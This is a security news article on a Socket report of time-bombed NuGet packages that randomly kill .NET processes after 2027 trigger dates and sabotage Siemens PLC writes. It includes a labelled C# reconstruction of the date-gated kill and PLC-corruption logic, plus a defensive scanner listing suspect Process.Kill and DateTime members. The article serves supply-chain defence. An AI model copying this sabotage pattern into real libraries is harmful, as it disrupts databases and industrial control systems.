Time‑Bombed NuGet Packages Target .NET Databases and Siemens PLCs, Socket Warns

CyberSecureFox 🦊

Researchers at Socket report nine malicious NuGet packages built around delayed activation: payloads engineered to lie dormant, and therefore undetected, for years before firing. The payloads target .NET data access (SQL Server, PostgreSQL, SQLite) and industrial communication with Siemens PLCs via the Sharp7 stack, with sabotage logic set to trigger between August 2027 and November 2028.

What Socket Found: Time‑Bombed NuGet Packages in the .NET Ecosystem

All flagged packages were published in 2023–2024 by a user named shanhai666. The account released 12 packages in total; nine carried malicious functionality and three appeared benign. Cumulative downloads approached 9,500 before the packages were removed from NuGet, and the number of projects that pulled them in as transitive dependencies remains unknown.

The attackers invested heavily in camouflage: roughly 99% of the code delivered legitimate functionality, with the destructive logic confined to about 20 lines. That ratio lowers the odds of detection during static analysis and quick code reviews, especially when the library appears useful and well structured.

How the Sabotage Works: C# Extension Methods and Date‑Based Triggers

The payloads piggyback on C# extension methods of the kind commonly used for database operations or industrial communications. On invocation, the code compares the system date against hard‑coded trigger dates spanning 08.08.2027–29.11.2028. When the trigger‑date condition is met, a random value between 1 and 100 is generated; if the value is above 80, the library force‑kills the current process via Process.GetCurrentProcess().Kill(). Because every call rolls independently, this yields a 20% chance of abrupt termination per call, producing failures that look sporadic and non‑reproducible, much like flaky software or infrastructure. Kill() is a hard termination: no finally blocks run and no buffered output is flushed, so an in‑flight database transaction or PLC write is simply abandoned.

Industrial Control Risk: Counterfeit Sharp7Extend Targets Siemens PLCs

One package, Sharp7Extend, poses as an “extension” to the widely used Sharp7 library for Ethernet (S7 protocol) communications with Siemens PLCs. The name was likely chosen to catch engineers searching for enhanced Sharp7 capabilities, increasing adoption in ICS/OT environments.

Observed Sabotage Behaviors Against PLC Workloads

Unlike the database packages, Sharp7Extend does not wait for a future date. For PLC clients it can immediately drop connections with a 20% probability, and that behavior stays active until 06.06.2028. It also attempts to read a non‑existent configuration key to break initialization. In addition, the package starts an internal delay of 30–90 minutes, after which 80% of write operations to PLCs are corrupted, combining instant disruption with a delayed data‑integrity attack. Of the two, the corrupted writes are the more dangerous in OT: a dropped connection is visible to operators, whereas a wrong value written to a PLC may go unnoticed until the physical process misbehaves.
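The following C# program is an illustrative reconstruction added for this article; it is not the shanhai666 packages' code. It models both behaviors described above: the date‑gated, 20%‑probability process kill hidden in a data‑access extension method, and the Sharp7Extend‑style PLC sabotage (20% connection drops until 06.06.2028, then 80% write corruption once a 30–90 minute grace period has elapsed). Assumptions not stated on the page: activation is "on or after" a package's trigger date, the cutoff comparison is strict, and the names SabotageDemo, ShouldKill, ShouldDropConnection, ShouldCorruptWrite and ExecuteWithSabotage are invented for the example. The simulated dates and the fixed random seed are constructed inputs.

```csharp
// Illustrative reconstruction (added example, not the actual malicious code).
// Assumed: "on or after" trigger semantics, strict cutoff, invented names.
using System;
using System.Diagnostics;

public static class SabotageDemo
{
    // Per-package trigger dates reported by Socket fall in this range.
    public static readonly DateTime EarliestTrigger = new DateTime(2027, 8, 8);
    public static readonly DateTime LatestTrigger   = new DateTime(2028, 11, 29);
    // Sharp7Extend connection drops run from first use until this date.
    public static readonly DateTime DropCutoff      = new DateTime(2028, 6, 6);

    // Pattern 1. 'roll' stands in for Random.Next(1, 101); 81..100 fires (20%).
    public static bool ShouldKill(DateTime now, DateTime trigger, int roll)
        => now.Date >= trigger.Date && roll > 80;

    // Pattern 2a. Immediate drops, active only before the cutoff (20%).
    public static bool ShouldDropConnection(DateTime now, int roll)
        => now.Date < DropCutoff && roll > 80;

    // Pattern 2b. After the grace period, 1..80 fires (80% of writes).
    public static bool ShouldCorruptWrite(TimeSpan sinceFirstUse, TimeSpan grace, int roll)
        => sinceFirstUse >= grace && roll <= 80;

    // The shape a reviewer should recognize: a clock read and a Random roll
    // on the hot path of a helper that otherwise just forwards the real call.
    // Main below never invokes this method, so the demo cannot kill itself.
    public static T ExecuteWithSabotage<T>(this Func<T> realCall, DateTime trigger, Random rng)
    {
        if (ShouldKill(DateTime.Now, trigger, rng.Next(1, 101)))
            Process.GetCurrentProcess().Kill();   // hard kill: no finally, no flush
        return realCall();                        // the "99% legitimate" part
    }

    public static void Main()
    {
        var rng = new Random(42);                 // fixed seed: reproducible run
        const int trials = 10_000;
        var trigger  = EarliestTrigger;
        var inWindow = new DateTime(2027, 10, 1); // constructed date after trigger
        var today    = new DateTime(2025, 1, 1);  // constructed "current" date

        int kills = 0, drops = 0, corrupt = 0;
        for (int i = 0; i < trials; i++)
        {
            if (ShouldKill(inWindow, trigger, rng.Next(1, 101))) kills++;
            if (ShouldDropConnection(today, rng.Next(1, 101))) drops++;
            if (ShouldCorruptWrite(TimeSpan.FromMinutes(95), TimeSpan.FromMinutes(60),
                                   rng.Next(1, 101))) corrupt++;
        }

        Console.WriteLine($"kills after trigger : {kills * 100.0 / trials:F1}% of calls (~20% expected)");
        Console.WriteLine($"kills before trigger: {(ShouldKill(today, trigger, 100) ? "possible" : "never")}");
        Console.WriteLine($"PLC drops today     : {drops * 100.0 / trials:F1}% (~20% until 2028-06-06)");
        Console.WriteLine($"writes corrupted    : {corrupt * 100.0 / trials:F1}% (~80% after grace period)");
        Console.WriteLine($"writes during grace : {(ShouldCorruptWrite(TimeSpan.FromMinutes(10), TimeSpan.FromMinutes(60), 1) ? "corrupted" : "clean")}");
    }
}
```

Create a console project (dotnet new console), replace Program.cs with the block, and dotnet run. The decision logic is split from the destructive action on purpose: the same separation is what makes a real payload easy to miss in review, because the date check, the random roll, and the Kill() call can each sit a few lines apart inside an otherwise ordinary helper.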

Why Detection and Forensics Are Difficult

Delayed activation years in the future and probabilistic execution complicate triage. By 2027–2028, the development teams that integrated these packages in 2024 may be disbanded or reassigned, and production incidents may be misattributed to hardware fluctuations or rare software defects. Similar long‑game tactics have surfaced in other ecosystems, among them the event-stream npm compromise (2018) and the xz backdoor (2024), highlighting the maturity and patience of modern software supply chain adversaries. Independent research from firms such as Sonatype and ReversingLabs has repeatedly documented the rise of malicious packages across npm, PyPI, and NuGet, underscoring that this is an ecosystem‑wide problem, not a one‑off anomaly.

Recommended Mitigations for Software Supply Chain Security

Socket advises auditing codebases and build artifacts for the identified packages and treating any system that has run them as compromised. Organizations should also:

  • Perform a full dependency inventory and generate an SBOM (CycloneDX or SPDX) with precise version pinning; include transitive packages, since a project may have pulled in one of these libraries without ever referencing it directly.
  • Lock versions (for .NET: RestorePackagesWithLockFile in the project file plus dotnet restore --locked-mode in CI), use private feeds/mirrors, and verify artifact integrity (checksums and signatures, e.g. dotnet nuget verify) in CI/CD.
  • Harden code reviews around extension methods that intercept database/PLC calls and other hooks in critical paths; a clock read combined with a random number on a data‑access hot path should never pass review unexplained.
  • Enable behavioral monitoring and logging for unexpected process exits, database anomalies, and PLC write errors, and correlate them by date rather than dismissing them as flakiness.
  • Continuously scan source and binaries for time‑based triggers, suspicious process‑kill calls, and obfuscated date logic.
  • Adopt supply‑chain baselines and frameworks (e.g., SLSA, NIST SSDF) to strengthen trust in third‑party components.
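As a concrete form of the "scan binaries for process‑kill calls and date logic" recommendation, here is a small scanner added for this article (it is not a Socket tool and not part of any package discussed). It walks every managed assembly under a directory, by default the local NuGet cache, and reads the IL metadata with System.Reflection.Metadata from the .NET base class library, flagging assemblies that reference both System.Diagnostics.Process.Kill and a DateTime clock or comparison member. The suspect‑member table, the default path and the class name TimeBombScanner are assumptions made for the example.

```csharp
// Added example: IL-metadata triage for time-bomb building blocks.
// Assumed: suspect-member table, default scan root, invented class name.
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection.Metadata;
using System.Reflection.PortableExecutable;

public static class TimeBombScanner
{
    // (namespace, type, member) triples worth a closer look when they appear
    // together inside a library that merely claims to wrap DB/PLC calls.
    static readonly (string Ns, string Type, string Member)[] Suspects =
    {
        ("System.Diagnostics", "Process",  "Kill"),
        ("System.Diagnostics", "Process",  "GetCurrentProcess"),
        ("System",             "DateTime", "get_Now"),           // DateTime.Now
        ("System",             "DateTime", "get_Today"),         // DateTime.Today
        ("System",             "DateTime", "op_GreaterThan"),    // a > b
        ("System",             "DateTime", "op_LessThan"),       // a < b
        ("System",             "DateTime", "CompareTo"),
        ("System",             "Random",   "Next"),
    };

    // Returns the suspect members referenced by one assembly (empty if none).
    // Throws BadImageFormatException for files that are not managed PE images.
    public static List<string> ScanAssembly(string path)
    {
        var hits = new List<string>();
        using var stream = File.OpenRead(path);
        using var pe = new PEReader(stream);
        if (!pe.HasMetadata) return hits;                // native DLL, skip
        MetadataReader md = pe.GetMetadataReader();

        // Every call into another assembly lands in the MemberRef table, so a
        // direct Process.Kill() call is visible here without disassembling IL.
        foreach (MemberReferenceHandle h in md.MemberReferences)
        {
            MemberReference mr = md.GetMemberReference(h);
            if (mr.Parent.Kind != HandleKind.TypeReference) continue;
            TypeReference tr = md.GetTypeReference((TypeReferenceHandle)mr.Parent);
            string ns     = md.GetString(tr.Namespace);
            string type   = md.GetString(tr.Name);
            string member = md.GetString(mr.Name);
            foreach (var s in Suspects)
                if (s.Ns == ns && s.Type == type && s.Member == member)
                    hits.Add($"{ns}.{type}::{member}");
        }
        return hits;
    }

    public static void Main(string[] args)
    {
        string root = args.Length > 0 ? args[0]
            : Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile),
                           ".nuget", "packages");

        foreach (string dll in Directory.EnumerateFiles(root, "*.dll", SearchOption.AllDirectories))
        {
            List<string> hits;
            try { hits = ScanAssembly(dll); }
            catch (BadImageFormatException) { continue; } // not a PE/managed image

            bool hasKill  = hits.Contains("System.Diagnostics.Process::Kill");
            bool hasClock = hits.Exists(h => h.StartsWith("System.DateTime::"));
            // The combination is the signal; either member alone is common in honest code.
            if (hasKill && hasClock)
                Console.WriteLine($"REVIEW  {dll}\n        {string.Join(", ", hits)}");
        }
    }
}
```

Run it with dotnet run -- <directory> (with no argument it scans ~/.nuget/packages). Treat the output as a triage list, not a verdict: a payload that reaches Process.Kill through reflection or obfuscated strings leaves no MemberRef to match, and legitimate service hosts also call Kill() and read the clock. The scan is cheap enough to run on every restore, which is where it earns its keep alongside lock files and signature verification.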

This campaign illustrates the growing sophistication of software supply chain attacks against both enterprise and ICS/OT workloads. Teams should act now: remove suspect packages, refresh dependency trust policies, automate scanning and forensics, and capture “known‑good” baselines. Early, disciplined controls substantially increase the odds of containing and neutralizing these time‑bombed dependencies before they impact operations.
